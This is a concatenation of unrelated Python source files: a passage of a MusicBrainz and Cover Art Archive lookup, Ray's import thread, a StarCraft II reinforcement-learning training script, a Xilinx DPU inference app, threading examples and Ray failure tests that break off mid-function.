self.logger.debug("Performing MusicBrainz Lookup For Album(s) [" + musicBrainzId + "]")
mbReleaseById = musicbrainzngs.get_release_by_id(id=musicBrainzId,
includes=['labels', 'aliases', 'recordings',
'release-groups', 'media', 'url-rels'])
if mbReleaseById:
releaseLabels = []
releaseMedia = []
trackCount = 0
coverUrl = self._getCoverArtUrl(musicBrainzId)
if 'release' in mbReleaseById:
mbRelease = mbReleaseById['release']
releaseDate = None
releaseType = None
if 'release-group' in mbRelease and mbRelease['release-group']:
if 'first-release-date' in mbRelease['release-group'] and mbRelease['release-group'][
'first-release-date']:
releaseDate = parseDate(mbRelease['release-group']['first-release-date'])
if 'type' in mbRelease['release-group'] and mbRelease['release-group']['type']:
releaseType = mbRelease['release-group']['type']
if not releaseType and 'primary-type' in mbRelease['release-group'] and \
mbRelease['release-group']['primary-type']:
releaseType = mbRelease['release-group']['primary-type']
release = Release(title=mbRelease['title'], releaseDate=releaseDate)
release.releaseType = releaseType
if 'label-info-list' in mbRelease:
labelsFound = []
for labelInfo in mbRelease['label-info-list']:
if 'label' in labelInfo and 'name' in labelInfo['label']:
label = None
labelName = labelInfo['label']['name']
if labelName not in labelsFound:
if labelName:
label = Label(name=labelName)
label.musicBrainzId = labelInfo['label']['id']
labelSortName = labelInfo['label']['sort-name']
label.sortName = labelSortName or labelName
if 'alias-list' in labelInfo['label']:
label.alternateNames = []
for alias in labelInfo['label']['alias-list']:
if not isInList(label.alternateNames, alias['alias']):
label.alternateNames.append(alias['alias'])
catalogNumber = None
if 'catalog-number' in labelInfo:
catalogNumber = labelInfo['catalog-number']
releaseLabels.append(
ReleaseLabel(catalogNumber=catalogNumber, label=label, release=release))
labelsFound.append(labelName)
if 'medium-list' in mbRelease:
for medium in mbRelease['medium-list']:
releaseMediaNumber = medium['position']
media = ReleaseMedia(releaseMediaNumber=releaseMediaNumber)
media.tracks = []
if 'track-list' in medium and medium['track-list']:
for mbTrack in medium['track-list']:
track = Track(title=mbTrack['recording']['title'])
if 'length' in mbTrack:
track.duration = mbTrack['length']
track.trackNumber = mbTrack['position']
track.releaseMediaNumber = releaseMediaNumber
track.musicBrainzId = mbTrack['id']
if not ([t for t in media.tracks if t.trackNumber == track.trackNumber]):
media.tracks.append(track)
trackCount += len(media.tracks)
media.trackCount = len(media.tracks)
releaseMedia.append(media)
release.trackCount = trackCount
release.coverUrl = coverUrl
release.musicBrainzId = musicBrainzId
release.media = releaseMedia
release.mediaCount = len(releaseMedia)
release.releaseLabels = releaseLabels
if not release.alternateNames:
release.alternateNames = []
cleanedTitle = createCleanedName(release.title)
if cleanedTitle not in release.alternateNames and cleanedTitle != release.title:
release.alternateNames.append(cleanedTitle)
return release
except:
self.logger.exception("MusicBrainy: Error In SearchForRelease")
pass
return None
def _getCoverArtUrl(self, musicBrainzId):
try:
url = "http://coverartarchive.org/release/" + musicBrainzId + "/"
rq = request.Request(url=url)
rq.add_header('Referer', self.referer)
with request.urlopen(rq) as f:
try:
s = StringIO((f.read().decode('utf-8')))
o = json.load(s)
r = o['images']
if r:
for image in r:
if image['front'] == "true":
return image['image']
except:
pass
except:
pass
# a = MusicBrainz()
# artist = a.lookupArtist('Danger Danger')
# #uprint(artist.info())
#
# release = a.lookupReleaseByMusicBrainzId("ae694c34-dbf4-31a3-89fc-1f2328ed53f4")
# uprint(release.info())
#
# release = a.lookupReleaseByMusicBrainzId("2990c4bd-d04f-4319-93a5-d95515bfb493")
# print(release.info())
#
# #r = a.lookupAllArtistsReleases(artist)
# # #release = a.searchForRelease(artist, "Cold Spring Harbor")
# #r = a.lookupReleaseByMusicBrainzId('038acd9c-b845-461e-ae76-c4f3190fc774')
# #print(r)
# # #print(artist.info())
# #print(release.info())
|
import_thread.py
|
from collections import defaultdict
import threading
import traceback
import redis
import ray
from ray import ray_constants
from ray import cloudpickle as pickle
from ray import profiling
from ray import utils
import logging
logger = logging.getLogger(__name__)
class ImportThread:
"""A thread used to import exports from the driver or other workers.
Note: The driver also has an import thread, which is used only to import
custom class definitions from calls to _register_custom_serializer that
happen under the hood on workers.
Attributes:
worker: the worker object in this process.
mode: worker mode
redis_client: the redis client used to query exports.
threads_stopped (threading.Event): A threading event used to signal to
the thread that it should exit.
imported_collision_identifiers: This is a dictionary mapping collision
identifiers for the exported remote functions and actor classes to
the number of times that collision identifier has appeared. This is
used to provide good error messages when the same function or class
is exported many times.
"""
def __init__(self, worker, mode, threads_stopped):
self.worker = worker
self.mode = mode
self.redis_client = worker.redis_client
self.threads_stopped = threads_stopped
self.imported_collision_identifiers = defaultdict(int)
def start(self):
"""Start the import thread."""
self.t = threading.Thread(target=self._run, name="ray_import_thread")
# Making the thread a daemon causes it to exit
# when the main thread exits.
self.t.daemon = True
self.t.start()
def join_import_thread(self):
"""Wait for the thread to exit."""
self.t.join()
def _run(self):
import_pubsub_client = self.redis_client.pubsub()
# Exports that are published after the call to
# import_pubsub_client.subscribe and before the call to
# import_pubsub_client.listen will still be processed in the loop.
import_pubsub_client.subscribe("__keyspace@0__:Exports")
# Keep track of the number of imports that we've imported.
num_imported = 0
try:
# Get the exports that occurred before the call to subscribe.
export_keys = self.redis_client.lrange("Exports", 0, -1)
for key in export_keys:
num_imported += 1
self._process_key(key)
while True:
# Exit if we received a signal that we should stop.
if self.threads_stopped.is_set():
return
msg = import_pubsub_client.get_message()
if msg is None:
self.threads_stopped.wait(timeout=0.01)
continue
if msg["type"] == "subscribe":
continue
assert msg["data"] == b"rpush"
num_imports = self.redis_client.llen("Exports")
assert num_imports >= num_imported
for i in range(num_imported, num_imports):
num_imported += 1
key = self.redis_client.lindex("Exports", i)
self._process_key(key)
except (OSError, redis.exceptions.ConnectionError) as e:
logger.error("ImportThread: {}".format(e))
finally:
# Close the pubsub client to avoid leaking file descriptors.
import_pubsub_client.close()
def _get_import_info_for_collision_detection(self, key):
"""Retrieve the collision identifier, type, and name of the import."""
if key.startswith(b"RemoteFunction"):
collision_identifier, function_name = (self.redis_client.hmget(
key, ["collision_identifier", "function_name"]))
return (collision_identifier, ray.utils.decode(function_name),
"remote function")
elif key.startswith(b"ActorClass"):
collision_identifier, class_name = self.redis_client.hmget(
key, ["collision_identifier", "class_name"])
return collision_identifier, ray.utils.decode(class_name), "actor"
def _process_key(self, key):
"""Process the given export key from redis."""
if self.mode != ray.WORKER_MODE:
# If the same remote function or actor definition appears to be
# exported many times, then print a warning. We only issue this
# warning from the driver so that it is only triggered once instead
# of many times. TODO(rkn): We may want to push this to the driver
# through Redis so that it can be displayed in the dashboard more
# easily.
if (key.startswith(b"RemoteFunction")
or key.startswith(b"ActorClass")):
collision_identifier, name, import_type = (
self._get_import_info_for_collision_detection(key))
self.imported_collision_identifiers[collision_identifier] += 1
if (self.imported_collision_identifiers[collision_identifier]
== ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD):
logger.warning(
"The %s '%s' has been exported %s times. It's "
"possible that this warning is accidental, but this "
"may indicate that the same remote function is being "
"defined repeatedly from within many tasks and "
"exported to all of the workers. This can be a "
"performance issue and can be resolved by defining "
"the remote function on the driver instead. See "
"https://github.com/ray-project/ray/issues/6240 for "
"more discussion.", import_type, name,
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD)
if key.startswith(b"RemoteFunction"):
with profiling.profile("register_remote_function"):
(self.worker.function_actor_manager.
fetch_and_register_remote_function(key))
elif key.startswith(b"FunctionsToRun"):
with profiling.profile("fetch_and_run_function"):
self.fetch_and_execute_function_to_run(key)
elif key.startswith(b"ActorClass"):
# Keep track of the fact that this actor class has been
# exported so that we know it is safe to turn this worker
# into an actor of that class.
self.worker.function_actor_manager.imported_actor_classes.add(key)
# TODO(rkn): We may need to bring back the case of
# fetching actor classes here.
else:
raise Exception("This code should be unreachable.")
def fetch_and_execute_function_to_run(self, key):
"""Run on arbitrary function on the worker."""
(job_id, serialized_function,
run_on_other_drivers) = self.redis_client.hmget(
key, ["job_id", "function", "run_on_other_drivers"])
if (utils.decode(run_on_other_drivers) == "False"
and self.worker.mode == ray.SCRIPT_MODE
and job_id != self.worker.current_job_id.binary()):
return
try:
# FunctionActorManager may call pickle.loads at the same time.
# Importing the same module in different threads causes deadlock.
with self.worker.function_actor_manager.lock:
# Deserialize the function.
function = pickle.loads(serialized_function)
# Run the function.
function({"worker": self.worker})
except Exception:
# If an exception was thrown when the function was run, we record
# the traceback and notify the scheduler of the failure.
traceback_str = traceback.format_exc()
# Log the error message.
utils.push_error_to_driver(
self.worker,
ray_constants.FUNCTION_TO_RUN_PUSH_ERROR,
traceback_str,
job_id=ray.JobID(job_id))
|
eval_mini_srcgame_worldmodel.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
USED_DEVICES = "0,1,2,3"
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = USED_DEVICES
import sys
import threading
import time
import tensorflow as tf
from absl import app
from absl import flags
from pysc2 import maps
from pysc2.lib import stopwatch
import lib.config as C
import param as P
import mini_source_agent_worldmodel as mini_source_agent
# from pysc2.env import sc2_env
from lib import my_sc2_env as sc2_env
from lib.replay_buffer import Buffer
from mini_network_worldmodel import MiniNetwork
from strategy.terran_agent import DummyTerran
from strategy_env import SimulatePlatform
import unit.protoss_unit as P
import unit.terran_unit as T
from datetime import datetime
import multiprocessing as mp
import numpy as np
from logging import warning as logging
FLAGS = flags.FLAGS
flags.DEFINE_bool("training", True, "Whether to train agents.")
flags.DEFINE_bool("on_server", True, "Whether is running on server.")
flags.DEFINE_integer("num_for_update", 100, "Number of episodes for each train.")
flags.DEFINE_string("log_path", "./logs/", "Path for log.")
flags.DEFINE_string("device", USED_DEVICES, "Device for training.")
# Simple64
flags.DEFINE_string("map", "Simple64", "Name of a map to use.")
flags.DEFINE_bool("render", False, "Whether to render with pygame.")
flags.DEFINE_integer("screen_resolution", 64, "Resolution for screen feature layers.")
flags.DEFINE_integer("minimap_resolution", 64, "Resolution for minimap feature layers.")
flags.DEFINE_enum("agent_race", "P", sc2_env.races.keys(), "Agent's race.")
flags.DEFINE_enum("bot_race", "T", sc2_env.races.keys(), "Bot's race.")
flags.DEFINE_enum("difficulty", "7", sc2_env.difficulties.keys(), "Bot's strength.")
flags.DEFINE_integer("max_agent_steps", 18000, "Total agent steps.")
flags.DEFINE_integer("step_mul", 8, "Game steps per agent step.")
flags.DEFINE_bool("profile", False, "Whether to turn on code profiling.")
flags.DEFINE_bool("trace", False, "Whether to trace the code execution.")
flags.DEFINE_bool("save_replay", False, "Whether to replays_save a replay at the end.")
flags.DEFINE_string("replay_dir", "multi-agent/", "dir of replay to replays_save.")
flags.DEFINE_string("restore_model_path", "./model/20190122-215114_source/", "path for restore model")
flags.DEFINE_bool("restore_model", False, "Whether to restore old model")
flags.DEFINE_integer("parallel", 4, "How many processes to run in parallel.")
flags.DEFINE_integer("thread_num", 5, "How many thread to run in the process.")
flags.DEFINE_integer("port_num", 4370, "the start port to create distribute tf")
flags.DEFINE_integer("max_iters", 100, "the rl agent max run iters")
flags.DEFINE_string("game_version", None, "game version of SC2")
FLAGS(sys.argv)
# set the play map
play_map = C.get_map_class('lib.config.' + FLAGS.map)
C.my_sub_pos = play_map.my_sub_pos
C.enemy_sub_pos = play_map.enemy_sub_pos
C.enemy_main_pos = play_map.enemy_main_pos
C.base_camera_pos = play_map.base_camera_pos
if not FLAGS.on_server:
PARALLEL = 1
THREAD_NUM = 1
MAX_AGENT_STEPS = 18000
DEVICE = ['/gpu:0']
NUM_FOR_UPDATE = 2
TRAIN_ITERS = 1
PORT_NUM = FLAGS.port_num
else:
PARALLEL = FLAGS.parallel
THREAD_NUM = FLAGS.thread_num
MAX_AGENT_STEPS = FLAGS.max_agent_steps
DEVICE = ['/gpu:' + dev for dev in FLAGS.device.split(',')]
#DEVICE = ['/cpu:0']
NUM_FOR_UPDATE = FLAGS.num_for_update
TRAIN_ITERS = FLAGS.max_iters
PORT_NUM = FLAGS.port_num
LOG = FLAGS.log_path
if not os.path.exists(LOG):
os.makedirs(LOG)
SERVER_DICT = {"worker": [], "ps": []}
# define some global variable
UPDATE_EVENT, ROLLING_EVENT = threading.Event(), threading.Event()
Counter = 0
Waiting_Counter = 0
Update_Counter = 0
Result_List = []
def run_thread(agent, game_num, Synchronizer, difficulty):
global UPDATE_EVENT, ROLLING_EVENT, Counter, Waiting_Counter, Update_Counter, Result_List
num = 0
all_num = 0
proc_name = mp.current_process().name
C._FPS = 22.4 / FLAGS.step_mul # 5.6
step_mul = FLAGS.step_mul # 4
C.difficulty = difficulty
with sc2_env.SC2Env(
map_name=FLAGS.map,
agent_race=FLAGS.agent_race,
bot_race=FLAGS.bot_race,
difficulty=difficulty,
step_mul=step_mul,
score_index=-1,
game_steps_per_episode=MAX_AGENT_STEPS,
screen_size_px=(FLAGS.screen_resolution, FLAGS.screen_resolution),
minimap_size_px=(FLAGS.minimap_resolution, FLAGS.minimap_resolution),
visualize=False,
game_version=FLAGS.game_version) as env:
# env = available_actions_printer.AvailableActionsPrinter(env)
agent.set_env(env)
while all_num != game_num * TRAIN_ITERS:
agent.play_train_worldmodel()
if FLAGS.training:
# check if the num of episodes is enough to update
num += 1
all_num += 1
reward = agent.result['reward']
Counter += 1
Result_List.append(reward)
logging("(diff: %d) %d epoch: %s get %d/%d episodes! return: %d!" %
(int(difficulty), Update_Counter, proc_name, len(Result_List), game_num * THREAD_NUM, reward))
# time for update
if num == game_num:
num = 0
ROLLING_EVENT.clear()
# worker stops rolling, wait for update
if agent.index != 0 and THREAD_NUM > 1:
Waiting_Counter += 1
if Waiting_Counter == THREAD_NUM - 1: # wait for all the workers stop
UPDATE_EVENT.set()
ROLLING_EVENT.wait()
# update!
else:
if THREAD_NUM > 1:
UPDATE_EVENT.wait()
Synchronizer.wait() # wait for other processes to update
agent.update_network(Result_List)
Result_List.clear()
agent.global_buffer.reset()
Synchronizer.wait()
Update_Counter += 1
# finish update
UPDATE_EVENT.clear()
Waiting_Counter = 0
ROLLING_EVENT.set()
if FLAGS.save_replay:
env.save_replay(FLAGS.replay_dir)
agent.reset()
def Worker(index, update_game_num, Synchronizer, cluster, model_path):
config = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False,
)
config.gpu_options.allow_growth = True
worker = tf.train.Server(cluster, job_name="worker", task_index=index, config=config)
sess = tf.Session(target=worker.target, config=config)
Net = MiniNetwork(sess=sess, summary_writer=None, rl_training=FLAGS.training,
cluster=cluster, index=index, device=DEVICE[index % len(DEVICE)],
ppo_load_path=FLAGS.restore_model_path, ppo_save_path=model_path)
global_buffer = Buffer()
agents = []
for i in range(THREAD_NUM):
agent = mini_source_agent.MiniSourceAgent(index=i, global_buffer=global_buffer, net=Net,
restore_model=FLAGS.restore_model, rl_training=FLAGS.training,
strategy_agent=None)
agents.append(agent)
print("Worker %d: waiting for cluster connection..." % index)
sess.run(tf.report_uninitialized_variables())
print("Worker %d: cluster ready!" % index)
while len(sess.run(tf.report_uninitialized_variables())):
print("Worker %d: waiting for variable initialization..." % index)
time.sleep(1)
print("Worker %d: variables initialized" % index)
game_num = np.ceil(update_game_num // THREAD_NUM)
UPDATE_EVENT.clear()
ROLLING_EVENT.set()
# Run threads
threads = []
for i in range(THREAD_NUM - 1):
t = threading.Thread(target=run_thread, args=(agents[i], game_num, Synchronizer, FLAGS.difficulty))
threads.append(t)
t.daemon = True
t.start()
time.sleep(3)
run_thread(agents[-1], game_num, Synchronizer, FLAGS.difficulty)
for t in threads:
t.join()
def Parameter_Server(Synchronizer, cluster, log_path, model_path, procs):
config = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False,
)
config.gpu_options.allow_growth = True
server = tf.train.Server(cluster, job_name="ps", task_index=0, config=config)
sess = tf.Session(target=server.target, config=config)
summary_writer = tf.summary.FileWriter(log_path)
Net = MiniNetwork(sess=sess, summary_writer=summary_writer, rl_training=FLAGS.training,
cluster=cluster, index=0, device=DEVICE[0 % len(DEVICE)],
ppo_load_path=FLAGS.restore_model_path, ppo_save_path=model_path)
agent = mini_source_agent.MiniSourceAgent(index=-1, net=Net, restore_model=FLAGS.restore_model, rl_training=FLAGS.training)
print("Parameter server: waiting for cluster connection...")
sess.run(tf.report_uninitialized_variables())
print("Parameter server: cluster ready!")
print("Parameter server: initializing variables...")
agent.init_network()
print("Parameter server: variables initialized")
update_counter = 0
max_win_rate = 0.
while update_counter < TRAIN_ITERS:
agent.reset_old_network()
# wait for update
Synchronizer.wait()
logging("Update Network!")
# TODO count the time , compare cpu and gpu
time.sleep(1)
# update finish
Synchronizer.wait()
logging("Update Network finished!")
steps, win_rate = agent.update_summary(update_counter)
logging("Steps: %d, win rate: %f" % (steps, win_rate))
update_counter += 1
if win_rate >= max_win_rate:
agent.save_model()
max_win_rate = win_rate
return max_win_rate
def _main(unused_argv):
# create distribute tf cluster
start_port = PORT_NUM
SERVER_DICT["ps"].append("localhost:%d" % start_port)
for i in range(PARALLEL):
SERVER_DICT["worker"].append("localhost:%d" % (start_port + 1 + i))
Cluster = tf.train.ClusterSpec(SERVER_DICT)
now = datetime.now()
model_path = "./model/" + now.strftime("%Y%m%d-%H%M%S") + "_worldmodel/"
if not os.path.exists(model_path):
os.makedirs(model_path)
log_path = "./logs/" + now.strftime("%Y%m%d-%H%M%S") + "_worldmodel/"
UPDATE_GAME_NUM = NUM_FOR_UPDATE
per_update_num = np.ceil(UPDATE_GAME_NUM / PARALLEL)
Synchronizer = mp.Barrier(PARALLEL + 1)
# Run parallel process
procs = []
for index in range(PARALLEL):
p = mp.Process(name="Worker_%d" % index, target=Worker, args=(index, per_update_num, Synchronizer, Cluster, model_path))
procs.append(p)
p.daemon = True
p.start()
time.sleep(1)
win_rate = Parameter_Server(Synchronizer, Cluster, log_path, model_path, procs)
print('#######################')
print('Final Win_rate:', win_rate)
print('#######################')
for p in procs:
p.join()
'''
if FLAGS.profile:
print(stopwatch.sw)
'''
if __name__ == "__main__":
app.run(_main)
|
app_mt.py
|
'''
Copyright 2020 Xilinx Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
from ctypes import *
from typing import List
import cv2
import numpy as np
import vart
import os
import pathlib
import xir
import threading
import time
import sys
import argparse
import shutil
# from scores import f1_score
divider = '------------------------------------'
def preprocess_fn(image_path, fix_scale):
"""
Image preprocessing. Convert float32 images into int8 images and scale them by a fix_scale factor
@return: the compiled .xmodel ready input image
"""
image = np.load(image_path)
image = image * fix_scale
image = image.astype(np.int8)
return image
def get_child_subgraph_dpu(graph: "Graph") -> List["Subgraph"]:
assert graph is not None, "'graph' should not be None."
root_subgraph = graph.get_root_subgraph()
assert (root_subgraph is not None), "Failed to get root subgraph of input Graph object."
if root_subgraph.is_leaf:
return []
child_subgraphs = root_subgraph.toposort_child_subgraph()
assert child_subgraphs is not None and len(child_subgraphs) > 0
return [
cs
for cs in child_subgraphs
if cs.has_attr("device") and cs.get_attr("device").upper() == "DPU"
]
def runDPU(id, start, dpu, img):
"""Single thread .xmodel inference process"""
'''get tensor'''
inputTensors = dpu.get_input_tensors()
outputTensors = dpu.get_output_tensors()
input_ndim = tuple(inputTensors[0].dims)
output_ndim = tuple(outputTensors[0].dims)
batchSize = input_ndim[0]
n_of_images = len(img)
count = 0
write_index = start
ids = []
ids_max = 50
outputData = []
for i in range(ids_max):
outputData.append([np.empty(output_ndim, dtype=np.int8, order="C")])
while count < n_of_images:
if (count + batchSize <= n_of_images):
runSize = batchSize
else:
runSize = n_of_images - count
'''prepare batch input/output '''
inputData = []
inputData = [np.empty(input_ndim, dtype=np.int8, order="C")]
'''init input image to input buffer '''
for j in range(runSize):
imageRun = inputData[0]
imageRun[j, ...] = img[(count + j) % n_of_images].reshape(input_ndim[1:])
'''run with batch '''
job_id = dpu.execute_async(inputData, outputData[len(ids)])
ids.append((job_id, runSize, start + count))
count = count + runSize
if count < n_of_images:
if len(ids) < ids_max - 1:
continue
for index in range(len(ids)):
dpu.wait(ids[index][0])
write_index = ids[index][2]
'''store output vectors '''
for j in range(ids[index][1]):
out_q[write_index] = outputData[index][0][j]
write_index += 1
ids = []
def app(image_dir, threads, model, save):
"""Runs the n-threads inference process"""
listimage = os.listdir(image_dir)
listimage = sorted(listimage)
listimage = listimage[:]
runTotal = len(listimage)
global out_q
out_q = [None] * runTotal
g = xir.Graph.deserialize(model)
subgraphs = get_child_subgraph_dpu(g)
all_dpu_runners = []
for i in range(threads):
all_dpu_runners.append(vart.Runner.create_runner(subgraphs[0], "run"))
# input scaling
input_fixpos = all_dpu_runners[0].get_input_tensors()[0].get_attr("fix_point")
input_scale = 2 ** input_fixpos
''' preprocess images '''
print(divider)
print('Pre-processing', runTotal, 'images...')
img = []
target = []
for i in range(runTotal):
path = os.path.join(image_dir, listimage[i])
img.append(preprocess_fn(path, input_scale))
'''run threads '''
print('Starting', threads, 'threads...')
threadAll = []
start = 0
for i in range(threads):
if (i == threads - 1):
end = len(img)
else:
end = start + (len(img) // threads)
in_q = img[start:end]
t1 = threading.Thread(target=runDPU, args=(i, start, all_dpu_runners[i], in_q))
threadAll.append(t1)
start = end
time1 = time.time()
for x in threadAll:
x.start()
for x in threadAll:
x.join()
time2 = time.time()
timetotal = time2 - time1
fps = float(runTotal / timetotal)
print(divider)
print("Throughput=%.2f fps, total frames = %.0f, time=%.4f seconds" % (fps, runTotal, timetotal))
''' post-processing '''
if save is True:
print('Saving ', len(out_q), ' predictions...')
try:
shutil.rmtree('predictions/')
except:
pass
os.makedirs('predictions', exist_ok=True)
assert len(listimage) == len(out_q)
for i in range(len(out_q)):
filename = 'pred_' + listimage[i]
np.save('predictions/' + filename, out_q[i])
print(divider)
return
# only used if script is run as 'main' from command line
def main():
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument('-d', '--image_dir', type=str, default='images', help='Path to folder of images. Default is images')
ap.add_argument('-t', '--threads', type=int, default=1, help='Number of threads. Default is 1')
ap.add_argument('-m', '--model', type=str, default='bionet.xmodel',
help='Path of xmodel. Default is customcnn.xmodel')
ap.add_argument('-s', '--save', action='store_true',
help='Save predictions to directory predictions/ . Default is False')
args = ap.parse_args()
print('Command line options:')
print(' --image_dir : ', args.image_dir)
print(' --threads : ', args.threads)
print(' --model : ', args.model)
print(' --save : ', args.save)
app(args.image_dir, args.threads, args.model, args.save)
if __name__ == '__main__':
main()
|
p01_start_stop_thread.py
|
import time
def countdown(n):
while n > 0:
print('T-minus', n)
n -= 1
time.sleep(5)
# Create and launch a thread
from threading import Thread
t = Thread(target=countdown, args=(10,))
t.start()
if t.is_alive():
print('Still running')
else:
print('Completed')
t.join()
t = Thread(target=countdown, args=(10,), daemon=True)
t.start()
class CountdownTask:
def __init__(self):
self._running = True
def terminate(self):
self._running = False
def run(self, n):
while self._running and n > 0:
print('T-minus', n)
n -= 1
time.sleep(5)
c = CountdownTask()
t = Thread(target=c.run, args=(10,))
t.start()
c.terminate() # Signal termination
t.join() # Wait for actual termination (if needed)
class IOTask:
def terminate(self):
# sock is a socket
sock.settimeout(5) # set timeout period
while self._running:
# Perform a blocking I/O operation w/ timeout
try:
data = sock.recv(8192)
break
except socket.timeout:
continue
# Continued processing
# Terminated
return
from threading import Thread
class CountdownThread(Thread):
def __init__(self, n):
super().__init__()
self.n = n
def run(self):
while self.n > 0:
print('T-minus', self.n)
self.n -= 1
time.sleep(5)
c = CountdownThread(5)
c.start()
import multiprocessing
c = CountdownTask(5)
p = multiprocessing.Process(target=c.run)
p.start()
|
test_failure_2.py
|
import json
import logging
import os
import signal
import sys
import threading
import time
import numpy as np
import pytest
import ray
from ray.experimental.internal_kv import _internal_kv_get
from ray.autoscaler._private.util import DEBUG_AUTOSCALING_ERROR
import ray._private.utils
from ray.util.placement_group import placement_group
import ray.ray_constants as ray_constants
from ray.cluster_utils import Cluster
from ray._private.test_utils import (init_error_pubsub, get_error_message,
Semaphore, wait_for_condition)
def test_warning_for_infeasible_tasks(ray_start_regular, error_pubsub):
p = error_pubsub
# Check that we get warning messages for infeasible tasks.
@ray.remote(num_gpus=1)
def f():
pass
@ray.remote(resources={"Custom": 1})
class Foo:
pass
# This task is infeasible.
f.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
# This actor placement task is infeasible.
Foo.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
# Placement group cannot be made, but no warnings should occur.
total_cpus = ray.cluster_resources()["CPU"]
# Occupy one cpu by an actor
@ray.remote(num_cpus=1)
class A:
pass
a = A.remote()
print(a)
@ray.remote(num_cpus=total_cpus)
def g():
pass
pg = placement_group([{"CPU": total_cpus}], strategy="STRICT_PACK")
g.options(placement_group=pg).remote()
errors = get_error_message(
p, 1, ray_constants.INFEASIBLE_TASK_ERROR, timeout=5)
assert len(errors) == 0, errors
def test_warning_for_infeasible_zero_cpu_actor(shutdown_only):
# Check that we cannot place an actor on a 0 CPU machine and that we get an
# infeasibility warning (even though the actor creation task itself
# requires no CPUs).
ray.init(num_cpus=0)
p = init_error_pubsub()
@ray.remote
class Foo:
pass
# The actor creation should be infeasible.
a = Foo.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
p.close()
del a
def test_warning_for_too_many_actors(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
p = init_error_pubsub()
@ray.remote
class Foo:
def __init__(self):
time.sleep(1000)
# NOTE: We should save actor, otherwise it will be out of scope.
actor_group1 = [Foo.remote() for _ in range(num_cpus * 10)]
assert len(actor_group1) == num_cpus * 10
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
actor_group2 = [Foo.remote() for _ in range(num_cpus * 3)]
assert len(actor_group2) == num_cpus * 3
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
p.close()
def test_warning_for_too_many_nested_tasks(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
p = init_error_pubsub()
remote_wait = Semaphore.remote(value=0)
nested_wait = Semaphore.remote(value=0)
ray.get([
remote_wait.locked.remote(),
nested_wait.locked.remote(),
])
@ray.remote
def f():
time.sleep(1000)
return 1
@ray.remote
def h(nested_waits):
nested_wait.release.remote()
ray.get(nested_waits)
ray.get(f.remote())
@ray.remote
def g(remote_waits, nested_waits):
# Sleep so that the f tasks all get submitted to the scheduler after
# the g tasks.
remote_wait.release.remote()
# wait until every lock is released.
ray.get(remote_waits)
ray.get(h.remote(nested_waits))
num_root_tasks = num_cpus * 4
# Lock remote task until everything is scheduled.
remote_waits = []
nested_waits = []
for _ in range(num_root_tasks):
remote_waits.append(remote_wait.acquire.remote())
nested_waits.append(nested_wait.acquire.remote())
[g.remote(remote_waits, nested_waits) for _ in range(num_root_tasks)]
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
p.close()
def test_warning_for_many_duplicate_remote_functions_and_actors(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def create_remote_function():
@ray.remote
def g():
return 1
return ray.get(g.remote())
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_remote_function.remote())
import io
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): It's terrible to have to rely on this implementation detail,
# the fact that the warning comes from ray._private.import_thread.logger.
# However, I didn't find a good way to capture the output for all loggers
# simultaneously.
ray._private.import_thread.logger.addHandler(ch)
ray.get(create_remote_function.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray._private.import_thread.logger.removeHandler(ch)
assert "remote function" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
# Now test the same thing but for actors.
@ray.remote
def create_actor_class():
# Require a GPU so that the actor is never actually created and we
# don't spawn an unreasonable number of processes.
@ray.remote(num_gpus=1)
class Foo:
pass
Foo.remote()
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_actor_class.remote())
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): As mentioned above, it's terrible to have to rely on this
# implementation detail.
ray._private.import_thread.logger.addHandler(ch)
ray.get(create_actor_class.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray._private.import_thread.logger.removeHandler(ch)
assert "actor" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
# Note that this test will take at least 10 seconds because it must wait for
# the monitor to detect enough missed heartbeats.
def test_warning_for_dead_node(ray_start_cluster_2_nodes, error_pubsub):
